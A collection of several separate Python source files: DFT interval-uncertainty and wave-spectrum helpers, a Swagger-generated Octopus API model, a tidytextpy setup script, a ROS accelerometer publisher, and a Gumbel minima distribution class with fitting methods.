""" Created June 2021 Author: Marco Behrendt Leibniz Universität Hannover, Germany University of Liverpool, United Kingdom https://github.com/marcobehrendt/Projecting-interval-uncertainty-through-the-discrete-Fourier-transform """ import numpy from numpy import (arange, cos, exp, linspace, mean, pi, sin, zeros) # for convenience from matplotlib import pyplot, cm # The code in this file should comply to PEP-8: https://realpython.com/python-pep8/ def subplots(figsize=(16,8),size=None): # wrapper of the matplotlib.pyplot figure gen if size is None: fig, ax = pyplot.subplots(figsize=figsize) else: fig, ax = pyplot.subplots(figsize=figsize,size=size) return fig,ax def plot_signal(signal,figsize=(18,6),xlabel=r'#$x$',ylabel=r'$x$',color=None,lw=1,title=None,ax=None,label=None): x = list(range(len(signal))) y = signal if ax is None: fig = pyplot.figure(figsize=figsize) ax = fig.subplots() ax.grid() ax.plot(x,y,marker='.',color=color,lw=lw,label=label) # https://matplotlib.org/3.1.0/gallery/color/named_colors.html ax.set_xlabel(xlabel,fontsize=20) ax.set_ylabel(ylabel,fontsize=20) ax.tick_params(direction='out', length=6, width=2, labelsize=14) if title is not None: ax.set_title(title,fontsize=20) return None def jonswap_spectrum(w,alpha,w_p,gamma,sigma1,sigma2): g = 9.81 N = len(w) spectrum = numpy.zeros(N) r = numpy.zeros(N) for x in range(len(w)): if w[x] == 0: spectrum[x] = 0 else: if w[x] <= w_p: r[x] = exp(-(w[x]-w_p)**2/(2*sigma1**2*w_p**2)) else: r[x] = exp(-(w[x]-w_p)**2/(2*sigma2**2*w_p**2)) spectrum[x] = alpha * g**2 / w[x]**5 * exp( -5/4 * (w_p/w[x])**4 ) * gamma**r[x] return spectrum def stochastic_process(spectrum, w, t): Nt = len(t) Nw = len(w) dw = w[1] - w[0] signal = numpy.zeros(Nt) for w_n in range(Nw): if w[w_n] == 0: A = 0 else: A = (2*spectrum[w_n]*dw)**0.5 phi = 2*pi*numpy.random.random_sample() signal += 2**0.5 * A * cos(w[w_n] * t + phi) return signal def wind_turbine(R,r,h_pile,rho_steel,c,k): A_steel = (R**2 - r**2)*pi V_steel = A_steel * h_pile m_steel = rho_steel * V_steel w0 = (k/m_steel)**0.5 xi = c/(w0*2*m_steel) return w0,xi def frequency_response_interval(w,spectrum,w0,xi): ai_low=[ai.lo() for ai in spectrum] ai_high=[ai.hi() for ai in spectrum] H_low = ai_low * abs(1/(w0**2 - w**2 + 2 * xi * w0*w*1j))**2 H_high = ai_high * abs(1/(w0**2 - w**2 + 2 * xi * w0*w*1j))**2 return H_low,H_high def frequency_response(w,spectrum,w0,xi): H = spectrum * abs(1/(w0**2 - w**2 + 2 * xi * w0*w*1j))**2 return H def periodogram(spectrum,t, dt): for x in range(len(spectrum)): spectrum[x] = spectrum[x]**2*dt**2/t[len(t)-1]/(2*pi) return spectrum def plot_line(x,y,figsize=(18,6),xlabel=r'#$x$',ylabel='$x$',color=None,lw=1,title=None,ax=None,label=None): if ax is None: fig = pyplot.figure(figsize=figsize) ax = fig.subplots() ax.grid() ax.plot(x,y,marker='.',color=color,lw=lw,label=label) # https://matplotlib.org/3.1.0/gallery/color/named_colors.html ax.set_xlabel(xlabel,fontsize=20) ax.set_ylabel(ylabel,fontsize=20) ax.tick_params(direction='out', length=6, width=2, labelsize=14) if title is not None: ax.set_title(title,fontsize=20) return ax def plot_bounds(x,bounds,color=None,alpha=None,ax=None): if ax is None: fig = pyplot.figure(figsize=(18,6)) ax = fig.subplots() ax.grid() bounds_low=[ai.lo() for ai in bounds] bounds_high=[ai.hi() for ai in bounds] ax.fill_between(x,bounds_low,bounds_high,alpha=alpha,label='Interval',edgecolor='blue',lw=2,color=color)
# coding: utf-8 """ Octopus Server API No description provided (generated by Swagger Codegen https://github.com/swagger-api/swagger-codegen) # noqa: E501 OpenAPI spec version: 2019.6.7+Branch.tags-2019.6.7.Sha.aa18dc6809953218c66f57eff7d26481d9b23d6a Generated by: https://github.com/swagger-api/swagger-codegen.git """ import pprint import re # noqa: F401 import six class FeedResource(object): """NOTE: This class is auto generated by the swagger code generator program. Do not edit the class manually. """ """ Attributes: swagger_types (dict): The key is attribute name and the value is attribute type. attribute_map (dict): The key is attribute name and the value is json key in definition. """ swagger_types = { 'id': 'str', 'name': 'str', 'feed_type': 'str', 'package_acquisition_location_options': 'list[str]', 'space_id': 'str', 'last_modified_on': 'datetime', 'last_modified_by': 'str', 'links': 'dict(str, str)' } attribute_map = { 'id': 'Id', 'name': 'Name', 'feed_type': 'FeedType', 'package_acquisition_location_options': 'PackageAcquisitionLocationOptions', 'space_id': 'SpaceId', 'last_modified_on': 'LastModifiedOn', 'last_modified_by': 'LastModifiedBy', 'links': 'Links' } def __init__(self, id=None, name=None, feed_type=None, package_acquisition_location_options=None, space_id=None, last_modified_on=None, last_modified_by=None, links=None): # noqa: E501 """FeedResource - a model defined in Swagger""" # noqa: E501 self._id = None self._name = None self._feed_type = None self._package_acquisition_location_options = None self._space_id = None self._last_modified_on = None self._last_modified_by = None self._links = None self.discriminator = None if id is not None: self.id = id if name is not None: self.name = name if feed_type is not None: self.feed_type = feed_type if package_acquisition_location_options is not None: self.package_acquisition_location_options = package_acquisition_location_options if space_id is not None: self.space_id = space_id if last_modified_on is not None: self.last_modified_on = last_modified_on if last_modified_by is not None: self.last_modified_by = last_modified_by if links is not None: self.links = links @property def id(self): """Gets the id of this FeedResource. # noqa: E501 :return: The id of this FeedResource. # noqa: E501 :rtype: str """ return self._id @id.setter def id(self, id): """Sets the id of this FeedResource. :param id: The id of this FeedResource. # noqa: E501 :type: str """ self._id = id @property def name(self): """Gets the name of this FeedResource. # noqa: E501 :return: The name of this FeedResource. # noqa: E501 :rtype: str """ return self._name @name.setter def name(self, name): """Sets the name of this FeedResource. :param name: The name of this FeedResource. # noqa: E501 :type: str """ self._name = name @property def feed_type(self): """Gets the feed_type of this FeedResource. # noqa: E501 :return: The feed_type of this FeedResource. # noqa: E501 :rtype: str """ return self._feed_type @feed_type.setter def feed_type(self, feed_type): """Sets the feed_type of this FeedResource. :param feed_type: The feed_type of this FeedResource. # noqa: E501 :type: str """ allowed_values = ["None", "NuGet", "Docker", "Maven", "OctopusProject", "GitHub", "Helm", "AwsElasticContainerRegistry", "BuiltIn"] # noqa: E501 if feed_type not in allowed_values: raise ValueError( "Invalid value for `feed_type` ({0}), must be one of {1}" # noqa: E501 .format(feed_type, allowed_values) ) self._feed_type = feed_type @property def package_acquisition_location_options(self): """Gets the package_acquisition_location_options of this FeedResource. # noqa: E501 :return: The package_acquisition_location_options of this FeedResource. # noqa: E501 :rtype: list[str] """ return self._package_acquisition_location_options @package_acquisition_location_options.setter def package_acquisition_location_options(self, package_acquisition_location_options): """Sets the package_acquisition_location_options of this FeedResource. :param package_acquisition_location_options: The package_acquisition_location_options of this FeedResource. # noqa: E501 :type: list[str] """ allowed_values = ["Server", "ExecutionTarget", "NotAcquired"] # noqa: E501 if not set(package_acquisition_location_options).issubset(set(allowed_values)): raise ValueError( "Invalid values for `package_acquisition_location_options` [{0}], must be a subset of [{1}]" # noqa: E501 .format(", ".join(map(str, set(package_acquisition_location_options) - set(allowed_values))), # noqa: E501 ", ".join(map(str, allowed_values))) ) self._package_acquisition_location_options = package_acquisition_location_options @property def space_id(self): """Gets the space_id of this FeedResource. # noqa: E501 :return: The space_id of this FeedResource. # noqa: E501 :rtype: str """ return self._space_id @space_id.setter def space_id(self, space_id): """Sets the space_id of this FeedResource. :param space_id: The space_id of this FeedResource. # noqa: E501 :type: str """ self._space_id = space_id @property def last_modified_on(self): """Gets the last_modified_on of this FeedResource. # noqa: E501 :return: The last_modified_on of this FeedResource. # noqa: E501 :rtype: datetime """ return self._last_modified_on @last_modified_on.setter def last_modified_on(self, last_modified_on): """Sets the last_modified_on of this FeedResource. :param last_modified_on: The last_modified_on of this FeedResource. # noqa: E501 :type: datetime """ self._last_modified_on = last_modified_on @property def last_modified_by(self): """Gets the last_modified_by of this FeedResource. # noqa: E501 :return: The last_modified_by of this FeedResource. # noqa: E501 :rtype: str """ return self._last_modified_by @last_modified_by.setter def last_modified_by(self, last_modified_by): """Sets the last_modified_by of this FeedResource. :param last_modified_by: The last_modified_by of this FeedResource. # noqa: E501 :type: str """ self._last_modified_by = last_modified_by @property def links(self): """Gets the links of this FeedResource. # noqa: E501 :return: The links of this FeedResource. # noqa: E501 :rtype: dict(str, str) """ return self._links @links.setter def links(self, links): """Sets the links of this FeedResource. :param links: The links of this FeedResource. # noqa: E501 :type: dict(str, str) """ self._links = links def to_dict(self): """Returns the model properties as a dict""" result = {} for attr, _ in six.iteritems(self.swagger_types): value = getattr(self, attr) if isinstance(value, list): result[attr] = list(map( lambda x: x.to_dict() if hasattr(x, "to_dict") else x, value )) elif hasattr(value, "to_dict"): result[attr] = value.to_dict() elif isinstance(value, dict): result[attr] = dict(map( lambda item: (item[0], item[1].to_dict()) if hasattr(item[1], "to_dict") else item, value.items() )) else: result[attr] = value if issubclass(FeedResource, dict): for key, value in self.items(): result[key] = value return result def to_str(self): """Returns the string representation of the model""" return pprint.pformat(self.to_dict()) def __repr__(self): """For `print` and `pprint`""" return self.to_str() def __eq__(self, other): """Returns true if both objects are equal""" if not isinstance(other, FeedResource): return False return self.__dict__ == other.__dict__ def __ne__(self, other): """Returns true if both objects are not equal""" return not self == other
from setuptools import setup import setuptools setup( name='tidytextpy', # 包名字 version='0.0.1', # 包版本 description='将R语言tidytext包移植到Python,可简单调用unnest_tokens、get_sentiments、get_stopwords、bind_tf_idf等函数。', # 简单描述 author='大邓', # 作者 author_email='thunderhit@qq.com', # 邮箱 url='https://github.com/thunderhit/tidytextpy', # 包的主页 packages=setuptools.find_packages(), package_data = {'': ['dictionary/*.txt','dictionary/*.csv']}, #所有目录下的csv、txt词典文件 python_requires='>=3.5', license="MIT", keywords=['tidytext', 'text analysis', 'sentiment', 'sentiment analysis', 'natural language processing', 'R', 'python'], long_description=open('README.md').read(), # 读取的Readme文档内容 long_description_content_type="text/markdown") # 指定包文档格式为markdown
#!/usr/bin/env python3 import board import busio import rospy import adafruit_lsm6ds from sensor_msgs.msg import Imu def main(): rospy.init_node('accelerometer', anonymous=False) pub = rospy.Publisher("imu", Imu, queue_size=10) rospy.loginfo('MMA8451 3DOF Accelerometer Publishing to IMU') i2c = busio.I2C(board.SCL, board.SDA) sensor = adafruit_lsm6ds.LSM6DSOX(i2c) imu_msg = Imu() imu_msg.linear_acceleration_covariance = [ 0, 0, 0, 0, 0, 0, 0, 0, 0 ] imu_msg.angular_velocity_covariance = [ 0, 0, 0, 0, 0, 0, 0, 0, 0 ] while not rospy.is_shutdown(): x, y, z = sensor.acceleration imu_msg.linear_acceleration.x = x imu_msg.linear_acceleration.y = y imu_msg.linear_acceleration.z = z pub.publish(imu_msg) rospy.sleep(1) rospy.logwarn('MMA8451 Accelerometer Offline') if __name__ == '__main__': main()
#!/usr/bin/env python # -*- coding: utf-8 -*- """ :class:`GumbelMin` class and functions related to Gumbel (minima) distribution. """ import numpy as np from scipy.special import zetac from scipy.optimize import leastsq, fsolve from matplotlib.pyplot import figure, ylabel, yticks, plot, legend, grid, show, xlabel, ylim, savefig from .empirical import empirical_cdf from .gumbel import _euler_masceroni as em # todo: move fit methods e.g. _msm from class to standalone functions (importable) # todo: check fit procedures (read up once more and check implementation) # todo: create unit tests class GumbelMin(object): """ The Gumbel minima distribution. The cumulative distribution function is defined as:: F(x) = 1 - exp{-exp[(x-a)/b]} where `a` is location parameter and `b` is the scale parameter. Parameters ---------- loc : float Gumbel location parameter. scale : float Gumbel scale parameter. data : array_like, optional Sample data, used to establish empirical cdf and is included in plots. To fit the Gumbel distribution to the sample data, use :meth:`GumbelMin.fit`. Attributes ---------- loc : float Gumbel location parameter. scale : float Gumbel scale parameter. data : array_like Sample data. Examples -------- To initiate an instance based on parameters, use: >>> from qats.stats.gumbelmin import GumbelMin >>> gumb = GumbelMin(loc, scale) If you need to establish a Gumbel instance based on a sample data set, use: >>> gumb = GumbelMin.fit(data, method='msm') References ---------- 1. Bury, K.V. (1975) Statistical models in applied science. Wiley, New York 2. Haver, S. (2007), "Bruk av asymptotiske ekstremverdifordelinger" 3. `Plotting positions <http://en.wikipedia.org/wiki/Q%E2%80%93Q_plot>`_, About plotting positions 4. `Usable estimators for parameters in Gumbel distribution <http://stats.stackexchange.com/questions/71197/usable-estimators-for-parameters-in-gumbel-distribution>`_ 5. `Bootstrapping statistics <https://en.wikipedia.org/wiki/Bootstrapping_(statistics)>`_ """ def __init__(self, loc=None, scale=None, data=None): self.location = loc self.scale = scale if data is not None: self.data = np.array(data) else: self.data = None @property def cov(self): """ Distribution coefficient of variation (C.O.V.) Returns ------- c : float distribution c.o.v. """ return self.std / self.mean @property def ecdf(self): """ Median rank empirical cumulative distribution function associated with the sample Notes ----- Gumbel recommended the following mean rank quantile formulation Pi = i/(n+1). This formulation produces a symmetrical CDF in the sense that the same plotting positions will result from the data regardless of whether they are assembled in ascending or descending order. A more sophisticated median rank formulation Pi = (i-0.3)/(n+0.4) approximates the median of the distribution free estimate of the sample variate to about 0.1% and, even for small values of n, produces parameter estimations comparable to the result obtained by maximum likelihood estimations (Bury, 1999, p43) A median rank method, pi=(i-0.3)/(n+0.4), is chosen to approximate the mean of the distribution [2] The empirical cdf is also used as plotting positions when plotting the sample on probability paper. """ x = np.array(self.data) try: #p = (np.arange(x.size) + 1. - 0.3) / (x.size + 0.4) p = empirical_cdf(self.data.size, kind='median') return p except TypeError: print("The sample is not defined.") @property def kurt(self): """ Distribution kurtosis Returns ------- k : float distribution kurtosis """ try: k = 12. / 5. return k except TypeError: print("Distribution parameters are not defined.") @property def mean(self): """ Distribution mean value Returns ------- m : float distribution mean value """ try: m = self.location - self.scale * em() return m except TypeError: print("Distribution parameters are not defined.") @property def median(self): """ Distribution median value Returns ------- m : float distribution median value """ try: m = self.location + self.scale * np.log(np.log(2.)) return m except TypeError: print("Distribution parameters are not defined.") @property def mode(self): """ Distribution mode value Returns ------- m : float distribution mode value """ try: m = self.location return m except TypeError: print("Distribution parameters are not defined.") @property def std(self): """ Distribution standard deviation Returns ------- s : float distribution standard deviation """ try: s = np.pi * self.scale / np.sqrt(6) return s except TypeError: print("Distribution parameters are not defined.") @property def skew(self): """ Distribution skewness Returns ------- s : float distribution skewness """ try: # zetac is the complementary Riemann zeta function (zeta function minus 1) # http://docs.scipy.org/doc/scipy/reference/generated/scipy.special.zetac.html s = -12. * np.sqrt(6.) * (1. + zetac(3)) / np.pi ** 3 return s except TypeError: print("Distribution parameters are not defined.") def bootstrap(self, size=None, method='msm', N=100): """ Parametric bootstrapping of source distribution Parameters ---------- size : int bootstrap sample size. default equal to source sample size method : {'msm','lse','mle'} method of fit, optional 'msm' = method of sample moments 'lse' = least-square estimation 'mle' = maximum likelihood estimation N : int number of bootstrap samples. default equal to 10 Returns ------- array-like m - mean distribution parameters array_like cv - coefficient of variation of distribution parameter Notes ----- In statistics, bootstrapping is a method for assigning measures of accuracy to sample estimates (variance,quantiles). This technique allows estimation of the sampling distribution of almost any statistic using only very simple methods. Generally, it falls in the broader class of resampling methods. In this case a parametric model is fitted to the data, and samples of random numbers with the same size as the original data, are drawn from this fitted model. Then the quantity, or estimate, of interest is calculated from these data. This sampling process is repeated many times as for other bootstrap methods. If the results really matter, as many samples as is reasonable, given available computing power and time, should be used. Increasing the number of samples cannot increase the amount of information in the original data, it can only reduce the effects of random sampling errors which can arise from a bootstrap procedure itself. See [5] about bootstrapping. """ options = {'msm': self._msm, 'lse': self._lse, 'mle': self._mle} assert method.lower() in options.keys(), "Method must be either %s" % (' or '.join(options.keys())) if size is None: assert self.data is not None, "Either size has to be specified or a sample has to be specified." size = np.size(self.data) i = 0 par = np.zeros((N, 2)) while (i < N): x = self.rnd(size=size) par[i, :] = options[method](x) i += 1 m = par.mean(axis=0) cv = par.std(axis=0, ddof=1) / m return m, cv def cdf(self, x=None): """ Cumulative distribution function (cumulative probability) for specified values x Parameters ---------- x : array_like values Returns ------- cdf : array cumulative probabilities for specified values x Notes ----- A range of x values [location, location+3*std] are applied if x is not specified. """ try: if x is None: x = np.linspace(self.loc, self.loc - 3. * self.std, 100) else: x = np.array(x) assert self.scale > 0., "The scale parameter must be larger than 0." z = (x - self.location) / self.scale p = 1. - np.exp(-np.exp(z)) return p except TypeError: print("Distribution parameters are not defined") def fit(self, data=None, method='msm', verbose=False): """ Determine distribution parameters by fit to sample. Parameters ---------- data : array_like sample, optional method : {'msm','lse','mle'} method of fit, optional 'msm' = method of sample moments 'lse' = least-square estimation 'mle' = maximum likelihood estimation verbose : bool turn on output of fitted parameters Notes ----- If data is not input any data stored in object (self.data) will be used. """ options = {'msm': msm, 'lse': lse, 'mle': mle} assert method.lower() in options.keys(), "Method must be either %s" % (' or '.join(options.keys())) if data is not None: # update sample data self.data = np.array(data).reshape(np.shape(data)) # make vector shaped try: self.location, self.scale = options[method](self.data) if verbose: print("Fitted parameters:\nlocation = %(location)5.3g\nscale = %(scale)5.3g" % self.__dict__) except TypeError: print("The sample data is not defined.") def fit_from_weibull_parameters(self, wa, wb, wc, n, verbose=False): """ Calculate Gumbel distribution parameters from n independent Weibull distributed variables. Parameters ---------- wa : float Weibull location parameter wb : float Weibull scale parameter wc : float Weibull shape parameter n : int Number independently distributed variables verbose : bool print fitted parameters Notes ----- A warning is issued if Weibull shape parameter less than 1. In this case, the convergence towards asymptotic extreme value distribution is slow , and the asymptotic distribution will be non-conservative relative to the exact distribution. The asymptotic distribution is correct with Weibull shape equal to 1 and conservative with Weibull shape larger than 1. These deviations diminish with larger samples. See [1, p. 380]. """ raise NotImplementedError("Formula for deriving Gumbel minimum distribution parameter is not implemented.") pass # self.location = wa + wb * np.log(n) ** (1. / wc) # self.scale = 1. / (wc / wb * np.log(n) ** ((wc - 1.) / wc)) # if verbose: # print "Fitted parameters:\nlocation = %(location)5.3g\nscale = %(scale)5.3g" % self.__dict__ def gp_plot(self, showfig=True, save=None): """ Plot data on Gumbel paper (linearized scales)) Parameters ---------- showfig : bool show figure immediately on screen, default True save : filename save figure to file, default None """ figure() x = np.sort(self.data) # sample z_data = -np.log(-np.log(self.ecdf)) plot(x, z_data, 'ko', label='Data') # fit distributions a_msm, b_msm = msm(self.data) a_mle, b_mle = mle(self.data) a_lse, b_lse = lse(self.data) z_msm = (x - a_msm) / b_msm z_mle = (x - a_mle) / b_mle z_lse = (x - a_lse) / b_lse plot(x, z_msm, '-r', label='MSM') plot(x, z_mle, '--g', label='MLE') plot(x, z_lse, ':b', label='LSE') # plotting positions and plot configurations p = np.array([0.1, 0.2, 0.5, 0.7, 0.8, 0.9, 0.95, 0.99, 0.999, 0.9999]) y = -np.log(-np.log(p)) yticks(y, p) legend(loc='upper left') ylim(y[0], y[-1]) xlabel('X') ylabel('Cumulative probability') grid(True) if showfig: show() elif save is not None: savefig(save) else: pass def invcdf(self, p=None): """ Inverse cumulative distribution function for specified quantiles p Parameters ---------- p : array_like quantiles (or. cumulative probabilities if you like) Returns ------- x : array values corresponding to the specified quantiles Notes ----- A range of quantiles from 0.001 to 0.999 are applied if quantiles are not specified """ try: if p is None: p = np.linspace(0.001, 0.999, 100) else: p = np.array(p) assert self.scale > 0., "The scale parameter must be larger than 0." x = np.zeros(np.shape(p)) x[p == 1.] = np.inf # asymptotic x[(p < 0.) | (p > 1.)] = np.nan # probabilities out of bounds z = (p >= 0.) & (p < 1.) # valid quantile range x[z] = self.location + self.scale * np.log(-np.log(1.-p[z])) return x except TypeError: print("Distribution parameters are not defined") def pdf(self, x=None): """ Probability density function for specified values x Parameters ---------- x : array_like values Returns ------- pdf : array probability density function for specified values x Notes ----- A range of x values [location, location+3*std] are applied if x is not specified. """ try: if x is None: x = np.linspace(self.loc, self.loc - 3. * self.std, 100) else: x = np.array(x) assert self.scale > 0., "The scale parameter must be larger than 0." z = (x - self.location) / self.scale p = (1. / self.scale) * np.exp(z - np.exp(z)) return p except TypeError: print("Distribution parameters are not defined") def plot(self, showfig=True, save=None): """ Plot data on regular scales Parameters ---------- showfig : bool show figure immediately on screen, default True save : filename including suffix save figure to file, default None """ figure() if self.data is not None: plot(np.sort(self.data), self.ecdf, 'ko', label='Data') y = np.linspace(0.001, 0.9999, 1000) x = self.invcdf(p=y) plot(x, y, '-r', label='Fitted') xlabel('X') ylabel('Cumulative probability') legend(loc='upper left') grid(True) if showfig: show() elif save is not None: savefig(save) else: pass def rnd(self, size=None, seed=None): """ Draw random samples from probability distribution Parameters ---------- size : int|numpy shape, optional sample size (default 1 random value is returned) seed : int seed for random number generator (default seed is random) Returns ------- x : array random sample """ if seed is not None: np.random.seed(seed) r = np.random.random_sample(size) x = self.invcdf(p=r) return x def lse(x): """ Fit distribution parameters to sample by method of least square fit to empirical cdf Parameters ---------- x : array_like sample Notes ----- Uses an approximate median rank estimate for the empirical cdf. """ x = np.sort(x) f = empirical_cdf(x.size, kind='median') fp = lambda v, z: 1. - np.exp(-np.exp((z - v[0]) / v[1])) # parametric Gumbel function e = lambda v, z, y: (fp(v, z) - y) # error function to be minimized a0, b0 = msm(x) # initial guess based on method of moments # least square fit p, cov, info, msg, ier = leastsq(e, [a0, b0], args=(x, f), full_output=1) return p[0], p[1] def mle(x): """ Fit distribution parameters to sample by maximum likelihood estimation Parameters ---------- x : array_like sample Notes ----- MLE equation set is given in 'Statistical Distributions' by Forbes et.al. (2010) and referred at [4] """ def mle_eq(p, z): """ MLE equation set Parameters ---------- p : list distribution parameters a, b, c z : array_like data """ loc, scale = p # unpack parameters n = z.size out = [loc + scale * np.log(1. / n * np.sum(np.exp(z / scale))), z.mean() - np.sum(z * np.exp(z / scale)) / np.sum(np.exp(z / scale)) - scale] return out x = np.array(x) a0, b0 = msm(x) # initial guess a, b = fsolve(mle_eq, [a0, b0], args=x) return a, b def msm(x): """ Fit distribution parameters to sample by method of sample moments Parameters ---------- x : array_like sample Notes ----- See description in [1] and [2]. """ x = np.array(x) b = np.sqrt(6.) * np.std(x, ddof=1) / np.pi # using the unbiased sample standard deviation a = x.mean() + em() * b return a, b